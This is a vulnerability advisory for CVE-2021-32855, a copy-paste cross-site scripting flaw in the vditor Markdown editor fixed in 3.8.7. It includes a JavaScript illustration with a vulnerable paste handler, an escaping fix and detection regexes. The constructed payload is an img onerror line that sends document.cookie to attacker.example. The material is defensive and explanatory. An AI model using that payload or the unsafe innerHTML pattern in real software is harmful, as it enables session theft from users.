CVE-2021-32855

vditor vulnerable to Cross-site Scripting

CVSS 6.1 MEDIUM · EPSS 0.6% · CWE-79
In short

Vditor, a browser-side Markdown editor, renders clipboard content without sanitizing it in versions before 3.8.7. An attacker who persuades a user to copy a crafted snippet and paste it into the editor gets JavaScript running in that user's browser session, which can expose the user's data or session. Upgrading to 3.8.7 or later fixes the issue.

Technical detail

Vditor prior to version 3.8.7 is vulnerable to copy-paste cross-site scripting (XSS): HTML carried in clipboard content is rendered by the editor without sanitization. The attack depends on social engineering, since the victim must be persuaded to copy an attacker-controlled payload and paste it into the editor (hence UI:R in the CVSS vector); once pasted, arbitrary JavaScript executes in the victim's browser in the origin of the page hosting the editor.
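The following is an added illustration of the pattern described above and is not vditor's code or its patch: a hypothetical editor that takes the richer text/html flavour of a paste and writes it straight into its preview, contrasted with a handler that treats the paste as text, plus a heuristic check that flags active content in pasted HTML. The clipboard payload and the attacker.example hostname are constructed for the example.

```javascript
// Added example (not vditor's code). A hypothetical paste handler shows how
// copy-paste XSS arises and how to close it. When a user copies rich text from
// an attacker's page, the clipboard carries a text/html flavour next to the
// harmless-looking text/plain flavour; the HTML is what the victim never saw.

// Constructed clipboard contents, modelled on what getData() would return.
const CONSTRUCTED_CLIPBOARD = {
  'text/plain': 'Harmless looking snippet',
  'text/html': `<p>Harmless looking snippet</p><img src=x onerror="fetch('https://attacker.example/?c=' + document.cookie)">`,
};

// Vulnerable pattern: prefer the rich flavour and hand it to innerHTML.
// Whatever string this returns would be parsed and executed by the browser.
function renderPasteUnsafe(clipboard) {
  return clipboard['text/html'] ?? clipboard['text/plain'] ?? '';
}

// Minimal HTML escaping so pasted markup is displayed, not interpreted.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened pattern: take the plain-text flavour and escape it. If only HTML is
// present, escape that too rather than trusting it. A Markdown editor that must
// keep rich paste should instead run the HTML through an allowlist sanitizer
// before it reaches innerHTML; plain text is the simplest safe default.
function renderPasteSafe(clipboard) {
  const text = clipboard['text/plain'] ?? clipboard['text/html'] ?? '';
  return escapeHtml(text);
}

// Heuristic check for active content in a pasted HTML string. This is a
// detection aid for tests and logging, not a sanitizer: it reports what it
// recognises and cannot prove a string is safe.
function findActiveContent(html) {
  const findings = [];
  if (/<script\b/i.test(html)) findings.push('script element');
  if (/\son[a-z]+\s*=/i.test(html)) findings.push('inline event handler');
  if (/(?:href|src|action|formaction)\s*=\s*["']?\s*javascript:/i.test(html)) {
    findings.push('javascript: URL');
  }
  if (/<(?:iframe|object|embed)\b/i.test(html)) findings.push('embedded frame or plugin');
  return findings;
}

// Demonstration run. Nothing here touches a real DOM.
console.log('unsafe render:', renderPasteUnsafe(CONSTRUCTED_CLIPBOARD));
console.log('safe render  :', renderPasteSafe(CONSTRUCTED_CLIPBOARD));
console.log('findings     :', findActiveContent(CONSTRUCTED_CLIPBOARD['text/html']));
```

The unsafe handler returns a string containing the onerror handler, so assigning it to innerHTML fires the fetch with the victim's cookies; the safe handler returns only escaped text. The heuristic check is useful in a paste-handling test suite to confirm that nothing reaching innerHTML still carries event handlers or script.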

Summary generated and translated by AI from the official description.
Vditor is a browser-side Markdown editor. Versions prior to 3.8.7 are vulnerable to copy-paste cross-site scripting (XSS). For this particular type of XSS, the victim needs to be fooled into copying a malicious payload into the text editor. Version 3.8.7 contains a patch for this issue.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Affected products
npm · vditor
